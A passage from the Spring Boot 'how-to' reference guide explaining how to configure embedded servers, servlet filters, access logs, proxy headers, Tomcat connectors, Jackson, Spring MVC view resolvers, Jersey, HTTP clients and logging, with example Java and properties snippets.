`NettyReactiveWebServerFactory`\n|===\n\nOnce you have access to a `WebServerFactory`, you can often add customizers to it to configure specific parts, like connectors, server resources, or the server itself - all using server-specific APIs.\n
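\nFor example, the following sketch registers a Tomcat connector customizer through the servlet-stack factory (the connector property and value shown are illustrative):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyConnectorCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ Tune the underlying Tomcat connector with a server-specific API\n\t\t\tfactory.addConnectorCustomizers((connector) -> connector.setProperty(\"maxKeepAliveRequests\", \"50\"));\n\t\t}\n\n\t}\n----\n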
\nAs a last resort, you can also declare your own `WebServerFactory` component, which will override the one provided by Spring Boot.\nIn this case, you cannot rely on configuration properties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, that is, with the `spring-boot-starter-web`, there are two ways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners supported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must provide a `@Bean` definition for it.\nDoing so can be very useful when you want to inject configuration or dependencies.\nHowever, you must be very careful that they do not cause eager initialization of too many other beans, because they have to be installed in the container very early in the application lifecycle.\n(For example, it is not a good idea to have them depend on your `DataSource` or JPA configuration.)\nYou can work around such restrictions by initializing the beans lazily when first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by adding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in addition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used.\nThis aligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please make sure to check the \"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\" section.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any `Servlet` or `Filter` beans are registered with the servlet container automatically.\nTo disable registration of a particular `Filter` or `Servlet` bean, create a registration bean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically registered with an embedded servlet container by annotating a `@Configuration` class with `@ServletComponentScan` and specifying the package(s) containing the components that you want to register.\nBy default, `@ServletComponentScan` scans from the package of the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective namespaces.\n\nFor instance, the following settings log access on Tomcat with a {tomcat-docs}\/config\/valve.html#Access_Logging[custom pattern]:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base directory.\nBy default, 
the `logs` directory is a temporary directory, so you may want to fix Tomcat's base directory or use an absolute path for the logs.\nIn the preceding example, the logs are available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the application.\nYou can customize this location by setting the configprop:server.undertow.accesslog.dir[] property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`.\nFor more details, see {jetty-docs}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nIf your application is running behind a proxy, a load balancer, or in the cloud, the request information (like the host, port, scheme...) might change along the way.\nYour application may be running on `10.10.10.10:8080`, but HTTP clients should only see `example.org`.\n\nhttps:\/\/tools.ietf.org\/html\/rfc7239[RFC7239 \"Forwarded Headers\"] defines the `Forwarded` HTTP header; proxies can use this header to provide information about the original request.\nYou can configure your application to read those headers and automatically use that information when creating links and sending them to clients in HTTP 302 responses, JSON documents or HTML pages.\nThere are also non-standard headers, like `X-Forwarded-Host`, `X-Forwarded-Port`, `X-Forwarded-Proto`, `X-Forwarded-Ssl`, and `X-Forwarded-Prefix`.\n\nIf the proxy adds the commonly used `X-Forwarded-For` and `X-Forwarded-Proto` headers, setting `server.forward-headers-strategy` to `NATIVE` is enough to support those.\nWith this option, the web servers themselves natively support this feature; you can check their specific documentation to learn about specific behavior.\n\nIf this is not enough, Spring Framework provides a {spring-framework-docs}\/web.html#filters-forwarded-headers[ForwardedHeaderFilter].\nYou can register it as a Servlet Filter in your application by setting `server.forward-headers-strategy` to `FRAMEWORK`.\n
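\nFor example, in `application.properties`:\n\n[source,properties,indent=0,configprops]\n----\n\tserver.forward-headers-strategy=framework\n----\n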
\nNOTE: If your application runs in Cloud Foundry or Heroku, the configprop:server.forward-headers-strategy[] property defaults to `NATIVE`.\nIn all other instances, it defaults to `NONE`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to carry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.remoteip.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal proxies that are to be trusted.\nBy default, IP addresses in `10\/8`, `192.168\/16`, `169.254\/16` and `127\/8` are trusted.\nYou can customize the valve's configuration by adding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for configuration.\nIf you use YAML, single backslashes are sufficient, and a value equivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do so in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by switching the automatic one off (to do so, set `server.forward-headers-strategy=NONE`) and adding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the `TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and HTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore or truststore\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values compliant with later Cookie specifications.\nIf, however, you cannot change the way that cookies are written, you can instead configure Tomcat to use a `LegacyCookieProcessor`.\nTo switch to the `LegacyCookieProcessor`, use a `WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-tomcat-mbean-registry]]\n=== Enable Tomcat's MBean Registry\nEmbedded Tomcat's MBean registry is disabled by default.\nThis minimizes Tomcat's memory footprint.\nIf you want to use Tomcat's MBeans, for example so 
that they can be used to expose metrics via Micrometer, you must use the configprop:server.tomcat.mbeanregistry.enabled[] property to do so, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\nserver.tomcat.mbeanregistry.enabled=true\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and add a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans with the underlying WebSocket container.\nWhen deployed to a standalone servlet container, this role is performed by a servlet container initializer, and the `ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\nSpring Boot has a number of starters that include Spring MVC.\nNote that some starters include a dependency on Spring MVC rather than including it directly.\nThis section answers common questions about Spring MVC and Spring Boot.\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON responses by default as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy object), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by default.\nNote that, in a browser, you might sometimes see XML responses, because browsers tend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you can use it to render XML responses.\nThe previous example that we used for JSON would work.\nTo use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered with the additional requirement of having 
`MyThing` annotated as `@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8.\nIf you use a more recent Java version, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an `Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content conversion in an HTTP exchange.\nIf Jackson is on the classpath, you already get the default converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which is auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for the Jackson XML converter) instance (created by default) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to configure various aspects of its processing.\nThese features are described in six enums (in Jackson) that map onto properties in the environment:\n\n|===\n| Enum | Property | Values\n\n| `com.fasterxml.jackson.databind.DeserializationFeature`\n| `spring.jackson.deserialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonGenerator.Feature`\n| `spring.jackson.generator.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.MapperFeature`\n| `spring.jackson.mapper.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonParser.Feature`\n| `spring.jackson.parser.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.SerializationFeature`\n| `spring.jackson.serialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.annotation.JsonInclude.Include`\n| configprop:spring.jackson.default-property-inclusion[]\n| `always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty printing, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<spring-boot-features.adoc#boot-features-external-config-relaxed-binding, relaxed binding>>, the case of `indent_output` does not have to match the case of the corresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured `Jackson2ObjectMapperBuilder` bean and applies to any mappers created by using the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more `Jackson2ObjectMapperBuilderCustomizer` beans.\nSuch customizer beans can be ordered (Boot's own customizer has an order of 0), letting additional customization be applied both before and after Boot's customization.\n
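\nA minimal sketch of such a customizer might look like the following (the bean name and the inclusion setting are illustrative):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic Jackson2ObjectMapperBuilderCustomizer jacksonCustomizer() {\n\t\t\/\/ Applied after Boot's own customizer (order 0) unless explicitly ordered otherwise\n\t\treturn (builder) -> builder.serializationInclusion(JsonInclude.Include.NON_NULL);\n\t}\n----\n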
\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered with the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper` instances that it creates.\nThis provides a global mechanism for contributing custom modules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of that type and mark it as `@Primary` or, if you prefer the builder-based approach, define a `Jackson2ObjectMapperBuilder` `@Bean`.\nNote that, in either case, doing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`, they replace the default value in the MVC configuration.\nAlso, a convenience bean of type `HttpMessageConverters` is provided (and is always available if you use the default MVC configuration).\nIt has some useful methods to access the default and user-enhanced message converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from `@RestController`).\nYou can contribute additional converters by adding beans of the appropriate type in a Spring Boot context.\nIf a bean you add is of a type that would have been included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON conversions), it replaces the default value.\nA convenience bean of type `HttpMessageConverters` is provided and is always available if you use the default MVC configuration.\nIt has some useful methods to access the default and user-enhanced message converters (for example, if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also contribute converters by overriding the `configureMessageConverters` method.\nHowever, unlike with normal MVC, you can supply only additional converters that you need (because Spring Boot uses the same mechanism to contribute its defaults).\nFinally, if you opt out of the Spring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration, you can take control completely and do everything manually by using `getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading files.\nBy default, Spring Boot configures Spring MVC with a maximum size of 1MB per file and a maximum of 10MB of file data in a single request.\nYou may override these values, the location to which intermediate data is stored (for example, to the `\/tmp` directory), and the threshold past which data is flushed to disk by using the properties exposed in the `MultipartProperties` class.\nFor example, if you want to specify that file sizes are unlimited, set the configprop:spring.servlet.multipart.max-file-size[] property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart-encoded file data as a `@RequestParam`-annotated 
parameter of type `MultipartFile` in a Spring MVC controller handler method.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/MultipartAutoConfiguration.java[`MultipartAutoConfiguration`] source for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads rather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`).\nIf you would rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\",configprops]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or `ServletRegistrationBean` for each and Spring Boot will register them transparently to the container.\nBecause servlets are registered that way, they can be mapped to a sub-context of the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a `@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of your custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own `@Configuration` with the `@EnableWebMvc` annotation.\nDoing so leaves all MVC configuration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in `@Controller` to actual `View` implementations.\nNote that `ViewResolvers` are mainly used in UI applications, rather than REST-style services (a `View` is not used to render a `@ResponseBody`).\nThere are many implementations of `ViewResolver` to choose from, and Spring on its own is not opinionated about which ones you should use.\nSpring Boot, on the other hand, installs one or two for you, depending on what it finds on the classpath and in the application context.\nThe `DispatcherServlet` uses all the resolvers it finds in the application context, trying each one in turn until it gets a result.\nIf you add your own, you have to be aware of the order and in which position your resolver is added.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'.\n This one locates physical resources that can be rendered by using the `DefaultServlet` (including static resources and JSP pages, if you use those).\n It applies a prefix and a suffix to the view name and then looks for a physical resource with that path in the servlet context (the defaults are both empty but are accessible for external configuration through `spring.mvc.view.prefix` and `spring.mvc.view.suffix`).\n You can override it by providing a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'.\n This is a useful member of the view resolver chain and picks up any beans with the same name as the `View` being resolved.\n It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are* actually beans of type `View` present.\n This is a '`master`' resolver, delegating to all the others and attempting to find a match to 
the '`Accept`' HTTP header sent by the client.\n There is a useful https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`] that you might like to study to learn more, and you might also look at the source code for detail.\n You can switch off the auto-configured `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named '`thymeleafViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.thymeleaf.prefix`, and the suffix is `spring.thymeleaf.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.html`', respectively.\n You can override `ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named '`freeMarkerViewResolver`'.\n It looks for resources in a loader path (which is externalized to `spring.freemarker.templateLoaderPath` and has a default value of '`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix.\n The prefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to `spring.freemarker.suffix`.\n The default values of the prefix and suffix are empty and '`.ftlh`', respectively.\n You can override `FreeMarkerViewResolver` by providing a bean of the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you also have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'.\n It looks for resources in a loader path by surrounding the view name with a prefix and suffix (externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\n The prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`', respectively.\n You can override `GroovyMarkupViewResolver` by providing a bean of the same name.\n* If you use Mustache, you also have a `MustacheViewResolver` named '`mustacheViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.mustache.prefix`, and the suffix is `spring.mustache.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.mustache`', respectively.\n You can override `MustacheViewResolver` by providing a bean of the same name.\n\nFor more detail, see the following sections:\n\n* {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user that has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and this can also be used when 
testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's {spring-security-docs}#test[reference documentation].\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same way as it can be used to secure a Spring MVC-based web application.\nHowever, if you want to use Spring Security's method-level security with Jersey, you must configure Jersey to use `setStatus(int)` rather than `sendError(int)`.\nThis prevents Jersey from committing the response before Spring Security has had an opportunity to report an authentication or authorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true` on the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-jersey-alongside-another-web-framework]]\n=== Use Jersey Alongside Another Web Framework\nTo use Jersey alongside another web framework, such as Spring MVC, it should be configured so that it allows the other framework to handle requests that it cannot handle itself.\nFirst, configure Jersey to use a Filter rather than a Servlet by configuring the configprop:spring.jersey.type[] application property with a value of `filter`.\nSecond, configure your `ResourceConfig` to forward requests that would have resulted in a 404, as shown in the following example.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t\tproperty(ServletProperties.FILTER_FORWARD_ON_404, true);\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\nSpring Boot offers a number of starters that work with HTTP clients.\nThis section answers questions related to using them.\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>, you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized `RestTemplate`.\nThis is the recommended approach for creating a `RestTemplate` configured to use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request factory that is being used.\nThe following example configures `HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts except `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n[[howto-webclient-reactor-netty-customization]]\n=== Configure the TcpClient used by a Reactor Netty-based WebClient\nWhen Reactor Netty is on the classpath, a Reactor Netty-based `WebClient` is auto-configured.\nTo customize the client's handling of network connections, provide a `ClientHttpConnector` bean.\nThe following example configures a 60 second connect timeout and adds a `ReadTimeoutHandler`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/reactive\/function\/client\/ReactorNettyClientCustomizationExample.java[tag=custom-http-connector]\n----\n\nTIP: Note the use of `ReactorResourceFactory` for 
the connection provider and event loop resources.\nThis ensures efficient sharing of resources for the server receiving requests and the client making requests.\n\n\n[[howto-logging]]\n== Logging\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which is typically provided by Spring Framework's `spring-jcl` module.\nTo use https:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on `spring-boot-starter-logging`.\nFor a web application, you need only `spring-boot-starter-web`, since it depends transitively on the logging starter.\nIf you use Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on the content of the classpath.\nIf Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers, you can do so in `application.properties` by using the \"logging.level\" prefix, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the console) by using \"logging.file.name\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native configuration format supported by the `LoggingSystem` in question.\nBy default, Spring Boot picks up the native configuration from its default location for the system (such as `classpath:logback.xml` for Logback), but you can set the location of the config file by using the configprop:logging.config[] property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you need to apply customizations to Logback beyond those that can be achieved with `application.properties`, you'll need to add a standard Logback configuration file.\nYou can add a `logback.xml` file to the root of your classpath for Logback to find.\nYou can also use `logback-spring.xml` if you want to use the <<spring-boot-features.adoc#boot-features-logback-extensions,Spring Boot Logback extensions>>.\n\nTIP: The Logback documentation has a https:\/\/logback.qos.ch\/manual\/configuration.html[dedicated section that covers configuration] in some detail.\n\nSpring Boot provides a number of Logback configurations that can be `included` from your own configuration.\nThese includes are designed to allow certain common Spring Boot conventions to be re-applied.\n\nThe following files are provided under 